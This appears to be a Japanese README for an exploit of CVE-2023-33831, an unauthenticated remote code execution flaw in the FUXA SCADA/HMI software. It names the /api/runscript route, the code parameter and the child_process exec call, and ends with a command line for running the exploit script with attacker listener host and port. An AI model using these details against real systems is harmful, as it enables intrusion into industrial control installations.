
CVE-2023-33831の説明とエクスプロイト - FUXA Webベースのプロセスビジュアライゼーション(SCADA/HMI/ダッシュボード)ソフトウェアに影響を与える
この脆弱性はFUXAのスクリプティングコンポーネントに影響を与えます。これは、ユーザーが制御可能な入力の制御やサニタイズが欠如しているため、危険なメソッドの使用を許し、リモートコード実行に拡大される可能性があります。 影響を受けるルートは/api/runscriptです。ここでは、認証を必要とせずに、codeパラメータを介してPOSTメソッドで、child_processモジュールのexec関数を使用してコマンドを実行することが可能です。
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>